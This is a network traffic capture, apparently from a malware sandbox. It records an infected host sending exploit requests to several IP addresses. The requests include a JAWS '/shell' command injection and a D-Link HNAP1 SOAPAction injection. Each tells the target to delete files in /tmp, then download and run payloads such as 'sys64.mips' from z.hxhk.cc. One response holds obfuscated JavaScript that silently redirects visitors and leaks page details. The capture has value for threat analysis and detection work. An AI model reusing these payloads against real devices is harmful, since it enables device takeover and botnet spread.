Mar 18, 2024 09:56:57.806767941 CET	502	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Mon, 18 Mar 2024 08:56:57 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.23	28542	213.176.32.61	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:56:57.575031042 CET	1384	IN	HTTP/1.1 200 OK Connection: close Cache-Control: max-age=259200 Content-Type: text/html;charset=utf-8 Content-Length: 1254 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 6c 48 62 6d 57 43 6d 71 4a 51 22 3e 3c 2f 61 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 20 20 66 75 6e 63 74 69 6f 6e 20 62 63 28 65 29 7b 65 3d 65 7c 7c 33 32 3b 76 61 72 20 74 3d 22 41 42 43 44 45 46 47 48 4a 4b 4d 4e 50 51 52 53 54 57 58 59 5a 61 62 63 64 65 66 68 69 6a 6b 6d 6e 70 72 73 74 77 78 79 7a 32 33 34 35 36 37 38 22 2c 61 3d 74 2e 6c 65 6e 67 74 68 2c 6e 3d 22 22 3b 66 6f 72 28 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 6e 2b 3d 74 2e 63 68 61 72 41 74 28 4d 61 74 68 2e 66 6c 6f 6f 72 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 61 29 29 3b 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 61 61 61 28 29 7b 63 6f 6e 73 74 20 6d 69 6e 3d 36 3b 63 6f 6e 73 74 20 6d 61 78 3d 31 32 3b 76 61 72 20 69 6e 64 65 78 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 28 6d 61 78 2d 6d 69 6e 2b 31 29 29 2b 6d 69 6e 3b 72 65 74 75 72 6e 20 62 63 28 69 6e 64 65 78 29 7d 66 75 6e 63 74 69 6f 6e 20 62 62 62 28 29 7b 63 6f 6e 73 74 20 6d 69 6e 3d 31 30 30 30 30 3b 63 6f 6e 73 74 20 6d 61 78 3d 36 30 30 30 30 3b 76 61 72 20 69 6e 64 65 78 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 28 6d 61 78 2d 6d 69 6e 2b 31 29 29 2b 6d 69 6e 3b 72 65 74 75 72 6e 20 69 6e 64 65 78 7d 76 61 72 20 73 74 72 55 3d 77 69 6e 64 6f 77 2e 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 38 3d 22 29 2b 61 61 61 28 29 2b 77 69 6e 64 6f 77 2e 61 74 6f 62 28 22 4c 6a 46 79 4f 54 4d 31 4c 6d 4e 76 62 54 6f 3d 22 29 2b 62 62 62 28 29 2b 22 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 62 74 6f 61 28 75 6e 65 73 63 61 70 65 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 6f 72 69 67 69 6e 29 29 29 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 62 74 6f 61 28 75 6e 65 73 63 61 70 65 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 29 29 29 2b 22 26 73 3d 22 2b 77 69 6e 64 6f 77 2e 62 74 6f 61 28 75 6e 65 73 63 61 70 65 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 29 29 29 3b 6c 48 62 6d 57 43 6d 71 4a 51 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6c 48 62 6d 57 43 6d 71 4a 51 22 29 2e 63 6c 69 63 6b 28 29 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 21 30 2c 21 30 29 2c 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6c 48 62 6d 57 43 6d 71 4a 51 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 7d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <title>Loading</title> </head> <body> <a href="" id="lHbmWCmqJQ"></a> <script type="text/javascript"> function bc(e){e=e\|\|32;var t="ABCDEFGHJKMNPQRSTWXYZabcdefhijkmnprstwxyz2345678",a=t.length,n="";for(i=0;i<e;i++)n+=t.charAt(Math.floor(Math.random()a));return n}function aaa(){const min=6;const max=12;var index=Math.floor(Math.random()(max-min+1))+min;return bc(index)}function bbb(){const min=10000;const max=60000;var index=Math.floor(Math.random()*(max-min+1))+min;return index}var strU=window.atob("aHR0cHM6Ly8=")+aaa()+window.atob("LjFyOTM1LmNvbTo=")+bbb()+"/?u="+window.btoa(unescape(encodeURIComponent(window.location.origin)))+"&p="+window.btoa(unescape(encodeURIComponent(window.location.pathname)))+"&s="+window.btoa(unescape(encodeURIComponent(window.location.search)));lHbmWCmqJQ.href=strU;if(document.all){document.getElementById("lHbmWCmqJQ").click()}else{var e=document.createEvent("MouseEvents");e.initEvent("click",!0,!0),document.getElementById("lHbmWCmqJQ").dispatchEvent(e)} </script> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.23	39664	124.87.30.108	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:56:57.745354891 CET	243	OUT	GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1 User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8 Connection: keep-alive
Mar 18, 2024 09:56:59.274674892 CET	243	OUT	GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1 User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8 Connection: keep-alive
Mar 18, 2024 09:57:01.066425085 CET	243	OUT	GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1 User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8 Connection: keep-alive
Mar 18, 2024 09:57:01.365573883 CET	531	IN	Data Raw: 7a 2e 68 78 68 6b 2e 63 63 2f 6a 61 77 73 3b 73 68 2b 2f 74 6d 70 2f 6a 61 77 73 2b 6a 73 20 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 32 31 35 31 61 34 33 2d 35 30 33 35 2d 39 39 32 37 2d 37 Data Ascii: z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1 404 Not FoundServer: 2151a43-5035-9927-738c-4f8f789ba37cDate: Mon, 18 Mar 2024 08:56:58 GMTCache-Control: no-cache,no-storeContent-Type: text/html; charset=%sConnection: close<HTML><HEAD><

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.23	40446	34.219.19.216	8081

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:56:58.485985041 CET	776	OUT	POST /HNAP1/ HTTP/1.0 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s` Content-Length: 640 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Mar 18, 2024 09:56:58.664526939 CET	1154	IN	HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=utf-8 Content-Length: 973 Date: Mon, 18 Mar 2024 09:11:45 GMT Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 36 2e 30 2e 32 36 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 48 4e 41 50 31 2f 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 48 4e 41 50 31 2f 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 28 2f 48 4e 41 50 31 2f 29 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 36 2e 30 2e 32 36 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Apache Tomcat/6.0.26 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /HNAP1/</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/HNAP1/</u></p><p><b>description</b> <u>The requested resource (/HNAP1/) is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/6.0.26</h3></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.23	39230	5.217.65.151	8081

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:56:58.552721024 CET	764	OUT	POST /HNAP1/ HTTP/1.0 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s` Content-Length: 640 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Mar 18, 2024 09:56:59.306668043 CET	764	OUT	POST /HNAP1/ HTTP/1.0 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s` Content-Length: 640 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Mar 18, 2024 09:57:00.810497046 CET	764	OUT	POST /HNAP1/ HTTP/1.0 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s` Content-Length: 640 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 